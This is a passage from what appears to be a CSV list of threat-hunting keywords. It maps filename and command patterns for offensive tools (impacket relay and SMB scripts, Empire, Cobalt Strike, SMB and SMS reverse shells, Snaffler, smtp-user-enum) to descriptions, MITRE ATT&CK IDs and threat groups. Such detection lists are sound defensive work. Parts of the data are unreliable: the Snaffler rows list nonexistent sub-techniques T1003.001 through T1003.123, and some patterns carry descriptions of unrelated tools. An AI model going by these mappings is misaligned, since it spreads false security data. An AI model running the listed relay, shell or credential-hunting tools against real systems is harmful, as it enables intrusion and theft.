T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*smbrelayclient.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*smbrelayclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*SMBRelayResponse*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*smbrelayserver.*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*smbrelayserver.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*smbrelayx.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*smb-reverse-shell.git*","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","10","10","9","0","2022-07-31T10:05:53Z","2022-01-16T21:02:14Z" +"*smb-reverse-shell-main*","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","10","10","9","0","2022-07-31T10:05:53Z","2022-01-16T21:02:14Z" +"*smbscan*","offensive_tool_keyword","smb-scanner","SMB Scanner tool","T1210.001 - T1190 - T1020 - T1213","TA0007 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/TechnicalMujeeb/smb-scanner","1","1","N/A","N/A","1","45","9","2018-03-30T10:25:18Z","2018-03-29T14:13:20Z" +"*smb-scanner*","offensive_tool_keyword","smb-scanner","SMB Scanner tool","T1210.001 - T1190 - T1020 - T1213","TA0007 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/TechnicalMujeeb/smb-scanner","1","1","N/A","N/A","1","45","9","2018-03-30T10:25:18Z","2018-03-29T14:13:20Z" +"*SmbScanner.exe*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A",,"N/A",,, +"*smbserver.py -payload*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*smbserver.py -smb2support EXEGOL*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*smbserver.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*smbsigning_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*smbspider *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*smbspider.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*smbsr.py*","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","2","138","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" +"*smicallef/spiderfoot*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","1","N/A","6","10","N/A","N/A","N/A","N/A" +"*SMShell.sln*","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","1","N/A","10","10","272","20","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z" +"*smtprelayclient.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*smtprelayclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*smtp-user-enum * -M EXPN *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*smtp-user-enum * -M RCPT *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*smtp-user-enum * -M VRFY *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*smtp-user-enum*","offensive_tool_keyword","smtp-user-enum","Username guessing tool primarily for use against the default Solaris SMTP service. Can use either EXPN - VRFY or RCPT TO.","T1133 - T1110.001","TA0007 - TA0006","N/A","N/A","Credential Access","https://pentestmonkey.net/tools/user-enumeration/smtp-user-enum","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*SnaffCon/Snaffler*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnaffCore.csproj*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnaffCore/ActiveDirectory*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnaffCore/Classifiers*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnaffCore/Concurrency*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnaffCore/Config*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*SnaffCore/ShareFind*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - 